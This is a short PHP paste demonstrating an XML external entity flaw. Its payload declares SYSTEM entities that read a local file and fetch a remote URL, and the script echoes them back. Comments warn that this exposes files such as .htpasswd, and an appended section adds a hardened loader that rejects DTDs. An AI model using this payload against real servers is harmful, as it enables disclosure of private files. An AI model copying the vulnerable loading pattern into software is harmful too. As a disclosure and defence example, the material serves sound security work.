Untitled

By: a guest on Feb 6th, 2010  |  syntax: PHP  |  size: 1.21 KB  |  views: 241  |  expires: Never
<?php
/*
 * Place a "foo.txt" file containing random text in the directory
 * containing this PHP script.
 */

/*
 * Wrote this in PHP; note that this "feature" is also present with
 * any libxml wrapper (like lxml in Python).
 *
 * I do not know if other XML parsers implement that.
 */

/* In real life, this may come from $_POST or an uploaded file */
$document = <<<'EOF'
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY robots SYSTEM "http://google.com/robots.txt">
<!ENTITY foobar SYSTEM "foo.txt">
]>

<root>
  &foobar;
  &robots;
</root>
EOF;

$xml = new DOMDocument();
$xml->loadXML($document);

foreach ($xml->getElementsByTagName('root') as $e)
    echo $e->nodeValue;

/*
 * For those who did not understand the consequences: imagine that
 * you are processing XML sent by users and displaying the result back.
 *
 * The users now have a way to display the contents of almost any file
 * accessible by the user launching the script (almost, because libxml
 * implements some kind of security by disallowing any absolute URI)
 * which does not contain invalid XML data. For example, a .htpasswd file,
 * or simple PHP files.
 *
 * Also, they can make your server download porn.
 */
?>
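The hardened counterpart of the loader above, added here as an example and not part of the original paste: it refuses documents that carry a DTD, disables libxml's external entity loader for the parse, and never passes LIBXML_NOENT, so neither "foo.txt" nor the remote URL is ever opened. The function name load_xml_safely and the sample inputs are my own.

```php
<?php
// Added example, not part of the original paste: a hardened counterpart to the
// loader above. The function name load_xml_safely is my own.

function load_xml_safely(string $document): DOMDocument
{
    // Untrusted input has no business carrying a DTD; refuse it up front.
    if (stripos($document, '<!DOCTYPE') !== false) {
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }
    // Before PHP 8.0 the external entity loader is enabled by default; switch it
    // off for this parse (in 8.0+ it is already off and the call is deprecated).
    $loaderState = PHP_VERSION_ID < 80000 ? libxml_disable_entity_loader(true) : null;
    $errorState  = libxml_use_internal_errors(true);
    try {
        $dom = new DOMDocument();
        // LIBXML_NONET forbids network fetches. LIBXML_NOENT is deliberately NOT
        // passed, so no entity is ever replaced by file or URL contents.
        if ($dom->loadXML($document, LIBXML_NONET) === false) {
            throw new InvalidArgumentException('XML is not well-formed');
        }
        // Belt and braces: a document that still declares entities is rejected.
        if ($dom->doctype !== null && $dom->doctype->entities->length > 0) {
            throw new InvalidArgumentException('entity declarations are not accepted');
        }
        return $dom;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($errorState);
        if ($loaderState !== null) {
            libxml_disable_entity_loader($loaderState);
        }
    }
}

// Constructed inputs: a benign document and a copy of the paste's payload.
$benign    = '<?xml version="1.0"?><root>hello</root>';
$untrusted = '<?xml version="1.0"?>'
           . '<!DOCTYPE root [<!ENTITY foobar SYSTEM "foo.txt">]>'
           . '<root>&foobar;</root>';

foreach ([$benign, $untrusted] as $candidate) {
    try {
        echo 'accepted: ', load_xml_safely($candidate)->documentElement->nodeValue, "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The benign document is returned unchanged, while the copy of the paste's payload is rejected at the DOCTYPE check before libxml ever sees a SYSTEM entity.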